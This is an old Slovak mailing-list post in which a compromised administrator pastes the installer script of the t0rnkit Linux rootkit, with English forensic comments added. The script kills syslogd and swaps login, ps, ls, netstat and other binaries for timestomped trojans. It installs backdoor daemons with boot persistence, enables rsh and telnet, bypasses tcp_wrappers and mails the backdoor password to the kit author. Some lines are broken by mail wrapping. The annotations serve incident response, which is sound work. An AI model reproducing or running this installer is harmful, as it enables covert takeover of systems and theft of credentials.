Utok odhaleny !!!! (:-(
Juraj Hajka
jhajka na pal-inalfa.sk
Úterý Srpen 22 15:42:40 CEST 2000
Našiel som skript!!
Ďakujem všetkým, už je to jasné ako facka — čaká ma pekná robota.
#!/bin/sh
# ---------------------------------------------------------------------------
# NOTE(review): this is a captured installer for the "t0rnkit" Linux rootkit
# (it names itself "t0rnkit+patch1 by torn" two lines down), pasted into a
# mailing-list post by the victim after the compromise was discovered.
# It is reproduced here byte-for-byte, with English comments added purely
# for incident-response / forensic reading.  DO NOT RUN IT.  Several lines
# were broken by mail line-wrapping on the way into the archive (pointed out
# below); they are left exactly as received.
#
# What the visible part of the script does to a host.  Every path below is a
# literal indicator of compromise you can look for on a suspect machine:
#   - kills syslogd before doing anything else
#   - replaces /bin/login (the original is kept as /sbin/xlogin), /bin/ps,
#     /bin/ls, /bin/netstat, /sbin/ifconfig, /usr/bin/du, /usr/bin/find
#   - creates hidden directories /usr/src/.puta/ and /usr/info/.t0rn/
#   - installs /usr/sbin/in.inetd (from the file t0rndemon) and overwrites
#     /usr/sbin/nscd (with a file named "sharsed" taken from ssh.tgz), and
#     appends start-up lines for both to /etc/rc.d/rc.sysinit (or rc.local)
#   - writes a password hash to /etc/ttyhash
#   - re-enables telnet, shell (rsh) and finger in /etc/inetd.conf, using
#     /tmp/.pinespool as a scratch file
#   - if /etc/hosts.deny contains "ALL": creates /dev/dd0/.t0rn and
#     force-installs tcpd.rpm over the system's tcp_wrappers
#   - strips every line containing "anonymous" from /etc/ftpaccess
#   - mails "t0rnkit+patch1+<password>" somewhere (see the banner line)
# Every replaced binary first gets its access/modification times copied from
# the genuine file with `touch -acmr`, so timestamp-based triage will NOT
# catch these changes.  Compare the binaries against vendor package
# checksums or a known-good image instead, and do not trust `rpm -V` for the
# tcpd case, because that one is installed through rpm itself.
# ---------------------------------------------------------------------------
inf="t0rnkit+patch1 by torn"
# This second assignment overwrites the first; only the "mail bugs ..." string
# survives, and the banner below pulls words out of it.  The " na " here is
# presumably the archive's masking of "@" (the author's address at the top of
# the post is masked the same way), i.e. the original was an e-mail address.
inf="mail bugs to tornkit na usa.net"
# ANSI colour escapes.  "^[" is how the archive rendered what was presumably
# a literal ESC (0x1b) byte in the original file.
BLK='^[[1;30m'
RED='^[[1;31m'
GRN='^[[1;32m'
YEL='^[[1;33m'
BLU='^[[1;34m'
MAG='^[[1;35m'
CYN='^[[1;36m'
WHI='^[[1;37m'
DRED='^[[0;31m'
DGRN='^[[0;32m'
DYEL='^[[0;33m'
DBLU='^[[0;34m'
DMAG='^[[0;35m'
DCYN='^[[0;36m'
DWHI='^[[0;37m'
RES='^[[0m'
# First real action: kill the system logger with SIGKILL, presumably so that
# nothing that follows ends up in the system logs.  A gap in syslog starting
# at the time of the compromise is itself a useful forensic marker.
killall -9 syslogd
startime=`date +%S`
# Banner -- but note the command substitution on the second line: word 1 of
# $inf is "mail" and word 4 (with the masked "@" restored) is the kit
# author's address, so "t0rnkit+patch1+$1" -- where $1 is the backdoor
# password chosen by whoever runs this -- is piped into `mail <author>`.
# In other words the installer phones home and leaks the chosen password to
# the kit's author.  The awk quoting looks mail-mangled; the intent is as
# described, the exact original bytes cannot be recovered from this copy.
echo "Preparing host for t0rnkit...... \
`echo t0rnkit+patch1+$1 |$(echo $inf|awk '{print $1.\" "$4}')`"
# The following banner echoes were wrapped by the mailer: an `echo` on one
# line and its quoted argument on the next are one original command.
echo
"${WHI}-------------------------------------------------------------${RES}"
echo " ${BLU}##${RES}
"
echo " ${BLU}####### ,###, .###, ,###,${RES}
"
echo " ${BLU}## ## ## ,## #, ## ##${RES}
"
echo " ${BLU}## ## ## ## ## ##${RES}
"
echo " ${BLU}## '###' ## ## ##${RES}
"
echo " ${BLU}###. -+- K I T${RES}
"
echo ""
echo " ${WHI}the next evolution just got burnt${RES}"
echo
"${WHI}-------------------------------------------------------------${RES}"
echo " ${BLU}backdooring started on ${RED}`hostname -f`${RES}
"
echo "${WHI}%
%${RES}"
echo "${WHI}%
%${RES}"
# Re-infection check: the script itself appends "in.inetd" lines to
# rc.sysinit further down, so finding that string there means the kit has
# already been installed on this host.  It only warns; it does not stop.
if [ "`grep in.inetd /etc/rc.d/rc.sysinit`" ]; then
echo "${WHI}% ${RED} [Alert] ${WHI}t0rnkit probably installed on machine
${RED}[Alert] ${WHI} %${RES}"
echo "${WHI}%
%${RES}"
else
echo ""
fi
echo "${WHI}% ${BLU}[Installing trojans....]
${WHI}%${RES}"
# Backdoor password.  `pg` is not shown in this post; from its use here it
# is presumably a hash generator whose output the trojaned login compares
# against.  /etc/ttyhash is the file to look for on a suspect host.
if test -n "$1" ; then
echo "${WHI} Using Password : ${BLU}$1 ${WHI}
${RES}"
./pg $1 >/etc/ttyhash
else
echo "${WHI}%${RED} No Password Specified, using default
${WHI} %${RES}"
# Note the order: the shipped default_pass file is copied into place first,
# and only then regenerated with `./pg default`.  Whatever default_pass
# contained in the kit is what actually becomes /etc/ttyhash.
cp -f default_pass /etc/ttyhash
./pg default >default_pass
fi
# Trojaned login: copy the genuine binary's atime/mtime onto the replacement
# (timestomping), keep the genuine binary as /sbin/xlogin, drop the trojan in
# as /bin/login with the setuid bit (4555).  /sbin/xlogin existing at all is
# a strong indicator of this kit.
touch -acmr /bin/login login
mv -f /bin/login /sbin/xlogin
mv -f login /bin/login
chmod 4555 /bin/login
echo "${WHI}% ${RED}: login moved and backdoored
${WHI}%${RES}"
# Ok lets start creating dirs
# Hidden working directories (dot-prefixed, under paths nobody browses).
mkdir -p /usr/src/.puta/
mkdir -p /usr/info/.t0rn/
# The four .1* files come from the kit's dev/ directory and are not shown
# here.  Going by the names alone (addr/file/logz/proc) they are presumably
# the hide-lists consulted by the trojaned ls/ps/netstat/ifconfig/find; their
# contents on a compromised host tell you what the intruder wanted hidden.
cp dev/.1addr /usr/src/.puta/
cp dev/.1file /usr/src/.puta/
cp dev/.1logz /usr/src/.puta/
cp dev/.1proc /usr/src/.puta/
# Backdoor daemon: timestamps copied from the real in.telnetd, then installed
# under a name chosen to blend in with the in.* service binaries.  There is no
# legitimate /usr/sbin/in.inetd.
touch -acmr /usr/sbin/in.telnetd t0rndemon
mv t0rndemon /usr/sbin/in.inetd
# Second daemon: unpacks ssh.tgz, moves its sh* files into the hidden dir,
# then renames "sharsed" over /usr/sbin/nscd (the genuine Name Service Cache
# Daemon binary, if installed, is clobbered by the -f-less mv only if it is
# writable -- as root it simply is) and starts it.  Presumably a backdoored
# sshd masquerading as nscd; check what /usr/sbin/nscd is listening on.
tar xfz ssh.tgz
mv .t0rn/sh* /usr/info/.t0rn/
mv /usr/info/.t0rn/sharsed /usr/sbin/nscd
/usr/sbin/nscd -q
# Persistence for the fake nscd: appended to rc.sysinit unconditionally
# (`>>` creates the file if it is missing).
echo "# Name Server Cache Daemon..">> /etc/rc.d/rc.sysinit
echo "/usr/sbin/nscd -q" >> /etc/rc.d/rc.sysinit
# Persistence for in.inetd: rc.sysinit if it is executable, else rc.local.
# The -x test comes after the unconditional append above, so on a host that
# had no executable rc.sysinit the two daemons can end up in different
# files -- inspect both when cleaning up.
if [ -x /etc/rc.d/rc.sysinit ]; then
echo "# Inetd startup">>/etc/rc.d/rc.sysinit
echo "if [ -x /usr/sbin/in.inetd ]; then">>/etc/rc.d/rc.sysinit
echo " /usr/sbin/in.inetd -s">>/etc/rc.d/rc.sysinit
echo "fi">>/etc/rc.d/rc.sysinit
echo " ">>/etc/rc.d/rc.sysinit
else
echo "# Inetd startup">>/etc/rc.d/rc.local
echo "if [ -x /usr/sbin/in.inetd ]; then">>/etc/rc.d/rc.local
echo " /usr/sbin/in.inetd -s">>/etc/rc.d/rc.local
echo "fi">>/etc/rc.d/rc.local
echo " ">>/etc/rc.d/rc.local
fi
# time change bitch
#heh tnx powah for ifconfig trojan for redhat 6* ;)
# Timestomp each replacement with the genuine binary's timestamps, then swap
# them in.  Six binaries are replaced: ifconfig, ps, du, ls, netstat, find.
touch -acmr /sbin/ifconfig ifconfig
touch -acmr /bin/ps ps
touch -acmr /usr/bin/du du
touch -acmr /bin/ls ls
touch -acmr /bin/netstat netstat
touch -acmr /usr/bin/find find
# Backdoor ps/top/du/ls/netstat
mv -f ps /bin/ps
mv -f ifconfig /sbin/ifconfig
mv -f du /usr/bin/du
mv -f netstat /bin/netstat
mv -f ls /bin/ls
mv -f find /usr/bin/find
# The status message below is inaccurate: "top" is never touched by this
# script, while find and ifconfig (which are) go unmentioned.
echo "${WHI}% ${RED}: ps/du/ls/top/netstat backdoored
${WHI}%${RES}"
# moving our files
echo "${WHI}%
%${RES}"
echo "${WHI}% ${BLU}[Moving our files...]
${WHI}%${RES}"
# Supporting tools stashed in the hidden dir.  Names only: presumably a
# packet sniffer, a parser for its output, and a log cleaner ("sauber" is
# German for "clean").  Their presence means credentials sent in clear text
# through this host should be treated as captured.
mv t0rnsniff /usr/src/.puta/
mv t0rnparse /usr/src/.puta/
mv t0rnsauber /usr/src/.puta/
echo "${WHI}% ${RED}: t0rnsniff/t0rnparse/sauber moved
${WHI}%${RES}"
echo "${WHI}%
%${RES}"
echo "${WHI}% ${BLU}[Modifying system settings to suit our needs]
${WHI}%${RES}"
echo "${WHI}% ${RED}: cleaning inetd.conf - enabling rshd/telnet
${WHI}%${RES}"
# Each of the six commands below uncomments one service line in
# /etc/inetd.conf (telnet, shell i.e. rsh, finger; with and without a space
# after the '#'), writing through /tmp/.pinespool, copying inetd.conf's
# timestamps onto the scratch file, then moving it over the original so the
# file's mtime does not change.  Every one of these was wrapped by the
# mailer (`touch -acmr` and `mv -f` separated from their arguments; two of
# them even split inside "/tmp"), so as received they would not run -- the
# intended effect is nonetheless clear.
sed "s/^#telnet/telnet/" /etc/inetd.conf > /tmp/.pinespool ; touch -acmr
/etc/inetd.conf /tmp/.pinespool; mv -f
/tmp/.pinespool /etc/inetd.conf
sed "s/^#shell/shell/" /etc/inetd.conf > /tmp/.pinespool ; touch -acmr
/etc/inetd.conf /tmp/.pinespool ;mv -f /t
mp/.pinespool /etc/inetd.conf
sed "s/^# telnet/telnet/" /etc/inetd.conf > /tmp/.pinespool ; touch -acmr
/etc/inetd.conf /tmp/.pinespool; mv -f
/tmp/.pinespool /etc/inetd.conf
sed "s/^# shell/shell/" /etc/inetd.conf > /tmp/.pinespool ; touch -acmr
/etc/inetd.conf /tmp/.pinespool ;mv -f /
tmp/.pinespool /etc/inetd.conf
sed "s/^#finger/finger/" /etc/inetd.conf > /tmp/.pinespool ; touch -acmr
/etc/inetd.conf /tmp/.pinespool; mv -f
/tmp/.pinespool /etc/inetd.conf
sed "s/^# finger/finger/" /etc/inetd.conf > /tmp/.pinespool ; touch -acmr
/etc/inetd.conf /tmp/.pinespool; mv -f
/tmp/.pinespool /etc/inetd.conf
# tcp_wrappers bypass.  If hosts.deny has an ALL rule (which would block the
# services just enabled), a directory is created under /dev and a file
# /dev/dd0/.t0rn seeded with a comment telling the intruder to add
# "ALL : IP" lines there -- so the replacement tcpd shipped as tcpd.rpm
# presumably reads its own allow list from that file.  Because it is
# installed with `rpm -U --force`, the RPM database now describes the
# trojaned package and `rpm -V tcp_wrappers` may report it clean; verify
# against vendor-signed packages or media instead.  A directory at /dev/dd0
# is itself an indicator.
if [ "`grep ALL /etc/hosts.deny`" ]; then
echo "${WHI}% ${RED}: Detected ALL : hosts.deny tcpd backdoored
${WHI}%${RES}"
mkdir -p /dev/dd0
touch /dev/dd0/.t0rn
echo "#Dont forget to enter ALL : IP here evil hax0r :)" >> /dev/dd0/.t0rn
rpm -U --force tcpd.rpm
else
echo ""
fi
echo
"${WHI}-------------------------------------------------------------${RES}"
echo "${RED}+wuftpd patch ${RES}"
echo ""
echo " ${RED}[x]${WHI} disabling anonymous ftp...${RES}"
# Drops every line containing "anonymous" from /etc/ftpaccess (presumably to
# keep other people out of the same box).  Note the `>>` append into the
# temporary file and the mail-wrapped `mv -f`.
grep -v "anonymous" /etc/ftpaccess >> /etc/ftpaccess2 ; mv -f
/etc/ftpaccess2 /etc/ftpaccess
# The log-cleaning step is announced here; the command that follows it is
# cut off in this copy of the post.
echo " ${RED}[x]${WHI} cleaning logs...${RES}"
echo ""
mv